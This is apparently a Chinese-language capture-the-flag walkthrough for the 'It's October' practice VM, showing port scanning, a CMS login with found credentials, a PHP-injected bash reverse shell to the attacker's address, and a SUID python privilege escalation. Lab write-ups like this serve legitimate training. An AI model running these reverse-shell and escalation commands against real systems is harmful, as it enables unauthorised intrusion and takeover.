描述

Welcome to “It’s October”

This boot to root VM is designed for testing your pentesting skills and concepts. It consists of some well known things but it encourages you to use the functionalities rather than vulnerabilities of target.

Goal: Get the root flag of the target.

Difficulty: Easy/Medium Level

Need hints? Twitter @akankshavermasv

DHCP is enabled

Your feedback is really valuable for me! Twitter @akankshavermasv

Was there something that you didn’t like about this VM?

Please let me know so that I can make more interesting challenges in the future.

Good Luck..!!!

  • 需要修改网卡信息

image-20221214094332269

存活

image-20221214094454400

1
2
kali 192.168.169.220
 靶机 192.168.169.230

靶机扫描

image-20221214094558807

1
22 80 3306 8080

访问

image-20221214094844244

8080

image-20221214094938832

image-20221214095034035

image-20221214095704904

1
2
user 		- admin
password 	- adminadmin2

扫描目录

image-20221214095926489

image-20221214100142380

  • 一个登录界面

image-20221214100236912

  • 用上面的密码,登录成

image-20221214100553619

1
是个CMS应该有利用的漏洞或者类似wordpress的插件漏洞

漏洞利用

image-20221214101851937

  • 添加反弹shell的php代码

    1
    2
    3
    4
    function onstart(){
          exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.169.220/6666 0>&1'");
    }

  • 设置监听

image-20221214102235513

  • 保存

image-20221214103853894

image-20221214103937453

  • 反弹成功

提权

  • 找一下suid权限
1
find / -perm -u=s -type f 2>/dev/null

image-20221214104149467

  • python提权
1
python3.7 -c 'import os;os.execl("/bin/bash","bash","-p")'

image-20221214104629707